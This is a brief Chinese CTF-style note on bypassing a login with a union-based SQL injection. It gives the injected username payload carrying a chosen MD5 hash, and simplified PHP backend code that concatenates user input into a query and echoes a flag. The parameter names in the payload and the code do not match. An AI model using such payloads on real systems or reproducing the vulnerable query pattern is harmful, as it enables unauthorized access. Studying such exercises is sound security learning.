联合注入查询
username=1’ union select 1,’admin’,’0f5ed8a8d8d44d86a570aacffa922251’#
passwd=ca01h
(ca01h——md5——0f5ed8a8d8d44d86a570aacffa922251)
即可查询成功
后端源码简化
<?php$name = $_POST['name'];$passwd = md5($_POST['pw']);$sql = "select * from user where username = '$name'";$query = mysql_query($sql);if (!strcasecmp($passwd, $query[passwd])) {echo $flag;} else {echo("Wrong Pass");}
